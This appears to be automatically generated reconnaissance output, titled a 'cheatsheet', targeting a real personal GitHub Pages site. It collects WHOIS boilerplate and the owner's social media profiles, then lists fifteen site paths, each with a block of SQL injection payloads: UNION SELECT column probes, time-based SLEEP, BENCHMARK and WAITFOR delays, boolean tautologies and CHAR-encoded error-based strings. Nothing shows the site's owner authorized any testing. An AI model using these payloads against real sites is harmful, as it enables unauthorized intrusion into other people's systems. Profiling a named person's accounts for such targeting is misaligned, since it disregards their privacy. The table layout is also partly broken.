

## Cheatsheet for <https://testsheepnz.github.io/>

### **\*\*OSINT Information\*\***

NOT FOUND

>>> Last update of WHOIS database: 2021-08-30T19:19:56Z <<<

Access to WHOIS information provided by Internet Computer Bureau Ltd. ("ICB") is provided to assist persons in determining the contents of a domain name registration record in the ICB registry database. The data in this record is provided by ICB for informational purposes only, and ICB does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (i) allow, enable, or otherwise support the transmission by e-mail, telephone, facsimile or other electronic means of mass, unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (ii) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or ICB or its services providers except as reasonably necessary to register domain names or modify existing registrations. UK privacy laws limit the scope of information permitted for certain public access.

Therefore, concerns regarding abusive use of domain registrations in the ICB registry should be directed to either (a) the Registrar of Record as indicated in the WHOIS output, or (b) the ICB anti-abuse department at [abuse@icbregistry.info](mailto:abuse@icbregistry.info).

All rights reserved. ICB reserves the right to modify these terms at any

|  |   |  |
|--|---|--|
| time. By submitting this query, you agree to abide by these policies   |   |  |
| The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. |   |  |
| **AI Powered Summary**   |   |  |
| "  |   |  |
| **Found Social Media Links**   |   |  |
| <a href="https://github.com/TestSheepNZ/TestSheepNZ.github.io/issues">https://github.com/TestSheepNZ/TestSheepNZ.github.io/issues</a>  |   |  |
| <a href="https://twitter.com/TestSheepNZ">https://twitter.com/TestSheepNZ</a>  |   |  |
| <a href="https://www.linkedin.com/in/mike-talks-3423348/">https://www.linkedin.com/in/mike-talks-3423348/</a>  |   |  |
| <a href="https://twitter.com/TestSheepNZ">https://twitter.com/TestSheepNZ</a>  |   |  |
| <a href="https://www.linkedin.com/in/mike-talks-3423348/">https://www.linkedin.com/in/mike-talks-3423348/</a>  |   |  |
| **Found Emails**   |   |  |
| No Email Addresses available   |   |  |
| **Suspected file types**   |   |  |
| '.html'  |   |  |
| **Found Paths**  |   |  |
| Method: GET, Total #: 15   |   |  |
| 1  | <a href="https://testsheepnz.github.io/index">https://testsheepnz.github.io/index</a> -> 200 -> SQLi Suggestions: |  |
| ✓  | x   | '\n'   |
| ✓  | x   | UNION ALL SELECT 'INJ'    'ECT'    'XXX',2,3,4,5,6,7-- |
| ✓  | x   | '&&SLEEP(5)&&'1  |
| ✓  | x   | ORDER BY SLEEP(5)                                      |
| ✓  | x   | AND 5650=CONVERT(INT,(UNION ALL                        |
| SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(12   |   |  |

0)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#

|   |   |   |
|---|---|---|
| 2 |   | https://testsheepnz.github.io/index.html -> 200 -> SQLi Suggestions:  |
| ✓ | x | UNION ALL SELECT 'INJ'    'ECT'    'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24                                     |
| ✓ | x | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--   |
| ✓ | x | UNION SELECT<br>@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,<br>21,22,23,24,25,26,27 |
| ✓ | x | " OR "" = "   |
| ✓ | x | ORDER BY 1,SLEEP(5),3,4--   |
| 3 |   | https://testsheepnz.github.io/video.html -> 200 -> SQLi Suggestions:  |
| ✓ | x | admin" or "1"="1"--   |
| ✓ | x | AND 5650=CONVERT(INT,(UNION ALL<br>SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))                                 |
| ✓ | x | ORDER BY<br>1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#                        |
| ✓ | x | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#  |
| ✓ | x | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#  |
| 4 |   | https://testsheepnz.github.io/video -> 200 -> SQLi Suggestions:   |
| ✓ | x | ""  |
| ✓ | x | UNION ALL SELECT 'INJ'    'ECT'    'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#   |
| ✓ | x | UNION ALL SELECT<br>@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,<br>NULL,NULL,NULL--         |
| ✓ | x | ORDER BY<br>1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24                               |
| ✓ | x | ORDER BY 7--  |

|   |  |   |
|---|--|---|
| 5 | https://testsheepnz.github.io/writing.html -> 200 -> SQLi Suggestions: |   |
| ✓ | x  | UNION SELECT<br>@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#  |
| ✓ | x  | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#  |
| ✓ | x  | AND 1=0   |
| ✓ | x  | 1=true  |
| ✓ | x  | AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT<br>(CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48)<br>END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) |
| 6 | https://testsheepnz.github.io/writing -> 200 -> SQLi Suggestions:      |   |
| ✓ | x  | UNION ALL SELECT 'INJ'  'ECT'  'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#  |
| ✓ | x  | ) or ('x')=('x  |
| ✓ | x  | AND 5650=CONVERT(INT,(UNION ALL<br>SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(12<br>0)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#                                   |
| ✓ | x  | waitfor delay '00:00:05'#   |
| ✓ | x  | ORDER BY<br>1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--   |
| 7 | https://testsheepnz.github.io/400.html -> 200 -> SQLi Suggestions:     |   |
| ✓ | x  | UNION ALL SELECT 'INJ'  'ECT'  'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#  |
| ✓ | x  | ORDER BY<br>1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2<br>7,28,29,30#  |
| ✓ | x  | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--  |
| ✓ | x  | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#  |

|    |   |   |
|----|---|---|
| ✓  | x   | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#   |
| 8  | https://testsheepnz.github.io/speaking.html -> 200 -> SQLi Suggestions: |   |
| ✓  | x   | ORDER BY 15--   |
| ✓  | x   | ORDER BY 8--  |
| ✓  | x   | ')) or benchmark(10000000,MD5(1))#  |
| ✓  | x   | ORDER BY 8--  |
| ✓  | x   | AND 5650=CONVERT(INT,(UNION ALL SELECT CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))   |
| 9  | https://testsheepnz.github.io/speaking -> 200 -> SQLi Suggestions:      |   |
| ✓  | x   | AND 5650=CONVERT(INT,(UNION ALL SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112))) |
| ✓  | x   | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14  |
| ✓  | x   | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)--  |
| ✓  | x   | UNION ALL SELECT 'INJ'  'ECT'  'XXX',2,3--  |
| ✓  | x   | and (select substring(@@version,1,1))='X'   |
| 10 | https://testsheepnz.github.io/LICENSE -> 200 -> SQLi Suggestions:       |   |
| ✓  | x   | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--  |
| ✓  | x   | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--  |
| ✓  | x   | AND 5650=CONVERT(INT,(UNION ALL SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112))) |
| ✓  | x   | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#   |
| ✓  | x   | AND 5650=CONVERT(INT,(UNION ALL   |

|    |   |   |
|----|---|---|
|    |   | SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--  |
| 11 |   | https://testsheepnz.github.io/503.html -> 200 -> SQLi Suggestions:  |
| ✓  | x | waitfor delay '00:00:05'--  |
| ✓  | x | AND 7506=9091 AND (5913=5913  |
| ✓  | x | " or ""^"   |
| ✓  | x | ORDER BY 16   |
| ✓  | x | HAVING 1=1  |
| 12 |   | https://testsheepnz.github.io/panther.html -> 200 -> SQLi Suggestions:  |
| ✓  | x | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#  |
| ✓  | x | or benchmark(50000000,MD5(1))#  |
| ✓  | x | AND 7300=7300 AND 'pKIZ'='pKIY  |
| ✓  | x | ORDER BY 24#  |
| ✓  | x | ));waitfor delay '0:0:5'--  |
| 13 |   | https://testsheepnz.github.io/panther -> 200 -> SQLi Suggestions:   |
| ✓  | x | AND 5650=CONVERT(INT,(UNION ALL<br>SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(12<br>0))) |
| ✓  | x | ORDER BY<br>1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#                      |
| ✓  | x | OR 3409=3409 AND ('pytW' LIKE 'pytW   |
| ✓  | x | AND 1=0--   |
| ✓  | x | or SLEEP(5)="   |
| 14 |   | https://testsheepnz.github.io/main-banner.html -> 200 -> SQLi Suggestions:  |
| ✓  | x | " or ""^"   |

|    |  |   |
|----|--|---|
| ✓  | x  | ')) or benchmark(10000000,MD5(1))#  |
| ✓  | x  | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))   |
| ✓  | x  | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11  |
| ✓  | x  | UNION SELECT<br>@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,<br>21,22#   |
| 15 | https://testsheepnz.github.io/main-banner -> 200 -> SQLi<br>Suggestions: |   |
| ✓  | x  | admin") or ("1"="1"#  |
| ✓  | x  | AND 5650=CONVERT(INT,(UNION ALL<br>SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(12<br>0)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))-- |
| ✓  | x  | OR 1=1#   |
| ✓  | x  | AND 5650=CONVERT(INT,(UNION ALL<br>SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(12<br>0)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--           |
| ✓  | x  | ORDER BY<br>1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2<br>7,28,29,30--   |